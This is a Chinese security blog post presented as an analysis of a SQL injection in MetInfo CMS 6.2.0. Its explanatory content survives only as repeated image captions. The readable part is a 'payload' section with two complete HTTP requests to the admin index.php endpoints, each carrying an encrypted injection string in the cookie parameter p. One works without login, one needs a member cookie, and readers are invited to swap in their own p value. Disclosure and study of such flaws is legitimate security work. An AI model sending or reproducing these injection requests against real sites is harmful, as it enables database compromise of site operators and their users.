登陆 注册

漏洞分析丨metinfo 6.2.0最新版本前台注入分析

桑云信息安云 2019-04-03 metinfo前台注入分析

漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第1张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第2张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第3张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第4张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第5张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第6张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第7张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第8张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第9张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第10张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第11张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第12张漏洞丨metinfo 6.2.0最新版本前台注入分析-互联网之家 漏洞分析丨metinfo 6.2.0最新版本前台注入分析  metinfo 前台注入分析 第13张

 

payload

这里有两个,一个是不需要登陆就可注入,另一个是coolcat表哥所说的需要以会员登陆。以下请自行替换p参数。

1、不需要登陆

GET /admin/index.php?n=user&m=web&c=register&a=doemailvild HTTP/1.1
Cookie: p=00c7%2FDBwD23b41olxVCthTvDDTRBhldmrrdyA8S3t%2F3yAl4QZ0P%2FSfOS5zlB

2、 需要登陆

GET /admin/index.php?n=user&m=web&c=profile&a=dosafety_emailadd HTTP/1.1
Cookie: p=497cD9UpkDtsvFzU9IKNlPvSyg1z%2bf09cmp8hqUeyJW9ekvPfJqx8cLKFSHr;<自行添加登陆后的cookie>


生成海报
请发表您的评论
桑云信息安云

桑云信息安云

乐山桑云信息技术有限公司专注于企业安全与网站、小程序、APP架设,为企业客户提供一站式解决方案,帮助企业快速实现互联网+转型。
247文章数 0评论数
请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net